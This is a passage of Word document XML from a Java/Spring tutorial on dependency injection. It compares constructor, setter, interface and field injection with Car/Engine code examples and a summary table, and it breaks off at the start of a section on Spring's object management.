    <w:p w14:paraId="02773351" w14:textId="77777777" w:rsidR="00320158" w:rsidRPr="00452C19" w:rsidRDefault="00320158" w:rsidP="00452C19">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31F85C54"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 Constructor Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FFADB4F"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public Car(Engine engine) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BC398B"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this.engine = engine;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F86D26"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65803B1F" w14:textId="77777777" w:rsidR="00320158" w:rsidRPr="00452C19" w:rsidRDefault="00320158" w:rsidP="00452C19">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0368F8D2"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public void start() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1E3A9F"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engine.run();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BBBD7A7"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304CFF1B"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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E375B2"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In this example, the Car class requires an Engine object. The dependency is injected via the constructor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7526DAB1" w14:textId="77777777" w:rsidR="00320158" w:rsidRPr="00452C19" w:rsidRDefault="0032015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2. Setter Injection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA0BEDF"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In Setter Injection, dependencies are provided through setter methods after the object has been instantiated. This approach allows for optional dependencies and allows the dependencies to be set or changed at any point after object creation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C7538B"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Key Characteristics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DCCFF1" w14:textId="77777777" w:rsidR="00320158" w:rsidRPr="00452C19" w:rsidRDefault="00320158" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1891"/>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Dependencies can be set or modified after the object is created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46221F3A" w14:textId="77777777" w:rsidR="00320158" w:rsidRPr="00452C19" w:rsidRDefault="00320158" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1891"/>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lastRenderedPageBreak/>
        <w:t>Not ideal for mandatory dependencies since the object can be created without its dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2614C345" w14:textId="77777777" w:rsidR="00320158" w:rsidRPr="00452C19" w:rsidRDefault="00320158" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1891"/>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Useful for optional dependencies or when the dependencies might change over time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059407AF"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF78158"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public class Car {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2429CC5C"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private Engine engine;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7291B285" w14:textId="77777777" w:rsidR="00320158" w:rsidRPr="00452C19" w:rsidRDefault="00320158" w:rsidP="00452C19">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A7A94FF"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 Setter Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB2DE11"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public void setEngine(Engine engine) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FE0D71"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this.engine = engine;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385664AB"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6560CBEF" w14:textId="77777777" w:rsidR="00320158" w:rsidRPr="00452C19" w:rsidRDefault="00320158" w:rsidP="00452C19">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D7C8B88"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public void start() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E01B5FA"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engine.run();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62AEFBEE"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E03B792"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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA63B46"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In this example, the Car class allows the Engine object to be injected through the setter method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473CC12C" w14:textId="77777777" w:rsidR="00320158" w:rsidRPr="00452C19" w:rsidRDefault="0032015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3. Interface Injection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00CB9F89"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Interface Injection is a less common form of dependency injection, where the dependent class must implement an interface that exposes a method for injecting the dependency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB4097D"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Key Characteristics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDCB528" w14:textId="77777777" w:rsidR="00320158" w:rsidRPr="00452C19" w:rsidRDefault="00320158" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1892"/>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The dependent class must implement an interface that provides a method to inject the dependency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1EC670" w14:textId="77777777" w:rsidR="00320158" w:rsidRPr="00452C19" w:rsidRDefault="00320158" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1892"/>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This method is more flexible but less commonly used in frameworks like Spring.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00AFA583"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6D3880"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public interface EngineAware {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121D8343"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void setEngine(Engine engine);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11414AA1"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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D8B930" w14:textId="77777777" w:rsidR="00320158" w:rsidRPr="00452C19" w:rsidRDefault="00320158" w:rsidP="00452C19">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="654530D7"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public class Car implements EngineAware {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6F901C"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private Engine engine;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F83A25" w14:textId="77777777" w:rsidR="00320158" w:rsidRPr="00452C19" w:rsidRDefault="00320158" w:rsidP="00452C19">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11DB6B38"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Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29AD0BA7"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public void setEngine(Engine engine) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA4C401"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this.engine = engine;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42005F5C"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23573626" w14:textId="77777777" w:rsidR="00320158" w:rsidRPr="00452C19" w:rsidRDefault="00320158" w:rsidP="00452C19">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63C50E98"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public void start() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CDBF4D"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engine.run();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0530BDE6"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F1DAA0"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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5CFD33"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In this example, the Car class implements the EngineAware interface and provides a method to set the Engine dependency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206A5589" w14:textId="77777777" w:rsidR="00320158" w:rsidRPr="00452C19" w:rsidRDefault="0032015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4. Field Injection (Specific to frameworks like Spring):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A60319A"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Field Injection is another form of DI, particularly popular in </w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Framework</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, where dependencies are injected directly into the fields (variables) of a class, typically using annotations such as @Autowired in Spring.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475BA9B3"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Key Characteristics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228A202E" w14:textId="77777777" w:rsidR="00320158" w:rsidRPr="00452C19" w:rsidRDefault="00320158" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1893"/>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Dependencies are injected directly into the fields of the class, often without using setters or constructors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28014A9F" w14:textId="77777777" w:rsidR="00320158" w:rsidRPr="00452C19" w:rsidRDefault="00320158" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1893"/>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Can be useful for simplicity but might make the code harder to test and maintain due to lack of explicit constructor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54987B4B" w14:textId="77777777" w:rsidR="00320158" w:rsidRPr="00452C19" w:rsidRDefault="00320158" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1893"/>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Typically used in Spring or other frameworks that support DI through annotations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BEDBA9"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Example in Spring</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFDE66B"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Component</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437D72CF"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public class Car {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EAA442B"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Autowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2505FEB6"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private Engine engine;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720964D4" w14:textId="77777777" w:rsidR="00320158" w:rsidRPr="00452C19" w:rsidRDefault="00320158" w:rsidP="00452C19">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D6E1B9D"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public void start() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342646F4"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        engine.run();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7CCE4A"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E02C9F2"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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0A1352"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In this example, the Engine dependency is injected directly into the Car class field via the @Autowired annotation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7993F26C" w14:textId="77777777" w:rsidR="00320158" w:rsidRPr="00452C19" w:rsidRDefault="0032015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Comparison of Injection Typ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0"/>
        <w:gridCol w:w="2817"/>
        <w:gridCol w:w="2836"/>
        <w:gridCol w:w="3221"/>
      </w:tblGrid>
      <w:tr w:rsidR="00452C19" w:rsidRPr="00452C19" w14:paraId="67EBED7A" w14:textId="77777777" w:rsidTr="00320158">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3BC81DEF" w14:textId="77777777" w:rsidR="00320158" w:rsidRPr="00452C19" w:rsidRDefault="0032015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Injection Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="073127AE" w14:textId="77777777" w:rsidR="00320158" w:rsidRPr="00452C19" w:rsidRDefault="0032015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When to Use</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03CBE720" w14:textId="77777777" w:rsidR="00320158" w:rsidRPr="00452C19" w:rsidRDefault="0032015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Advantages</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="406E70D8" w14:textId="77777777" w:rsidR="00320158" w:rsidRPr="00452C19" w:rsidRDefault="0032015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Disadvantages</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00452C19" w:rsidRPr="00452C19" w14:paraId="499E12AF" w14:textId="77777777" w:rsidTr="00320158">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61024772"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Constructor Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F7BD05C"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hen dependencies are mandatory and should be immutable.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3BF51B22"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Ensures that dependencies are provided at creation time. - Makes dependencies explicit.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="451ECCA8"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Cannot change dependencies after object creation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00452C19" w:rsidRPr="00452C19" w14:paraId="62A78DA9" w14:textId="77777777" w:rsidTr="00320158">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="503FB29E"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Setter Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="36B43895"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hen dependencies are optional or can be changed during the object's lifecycle.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3AEB7629"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More flexible than constructor injection. - Allows for modification of dependencies at any time.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7620C80D"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Can lead to incomplete objects if not all dependencies are set.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00452C19" w:rsidRPr="00452C19" w14:paraId="40EFF1B7" w14:textId="77777777" w:rsidTr="00320158">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="50F27ECF"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Interface Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="01F7B30E"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hen you want to decouple dependency injection logic from the class, but this is less common.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="169CCA20"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Allows for greater flexibility and separation of concerns.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1802DD49"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Less commonly used and can lead to complex code.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00452C19" w:rsidRPr="00452C19" w14:paraId="5302182F" w14:textId="77777777" w:rsidTr="00320158">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5018DC29"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Field Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64C2F333"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hen you want simplicity, often used in frameworks like Spring.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="25F8D15B"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Simple and concise. - Does not require constructors or setters.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="55846421"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Makes dependencies less explicit and harder to test. - Difficult to see if a class has all its required dependencies.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1266A6E2" w14:textId="77777777" w:rsidR="00320158" w:rsidRPr="00452C19" w:rsidRDefault="0032015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Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071CDD7C" w14:textId="77777777" w:rsidR="00320158" w:rsidRPr="00452C19" w:rsidRDefault="00320158" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="189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Constructor Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is preferred when dependencies are mandatory and immutable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7969860E" w14:textId="77777777" w:rsidR="00320158" w:rsidRPr="00452C19" w:rsidRDefault="00320158" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="189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Setter Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is useful when dependencies are optional or may change over time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6048C723" w14:textId="77777777" w:rsidR="00320158" w:rsidRPr="00452C19" w:rsidRDefault="00320158" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="189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Interface Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a less common pattern but can provide flexibility and decoupling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630C73E3" w14:textId="77777777" w:rsidR="00320158" w:rsidRPr="00452C19" w:rsidRDefault="00320158" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="189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Field Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is used in frameworks like Spring for simplicity but is less explicit and harder to maintain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC6B410" w14:textId="77777777" w:rsidR="00320158" w:rsidRPr="00452C19" w:rsidRDefault="0032015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In modern frameworks like </w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Constructor Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is typically the preferred method as it makes dependencies clear and helps ensure that objects are fully initialized with all required dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76AF31C8" w14:textId="68B38F2B" w:rsidR="00AD1E70" w:rsidRPr="00CE4B95"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D23FD26">
          <v:rect id="_x0000_i2119" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E75A675" w14:textId="24513031" w:rsidR="00A930F5" w:rsidRPr="00CE4B95" w:rsidRDefault="004D0ECE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="445" w:name="_Toc196307925"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Who will take care of objects in Spring</w:t>
      </w:r>
      <w:r w:rsidR="00A930F5" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="445"/>
    </w:p>
    <w:p w14:paraId="48C918E0" w14:textId="7FFF11AB" w:rsidR="007D1098" w:rsidRPr="00452C19" w:rsidRDefault="007D1098" w:rsidP="00452C19">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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In </w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Framework</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, the </w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
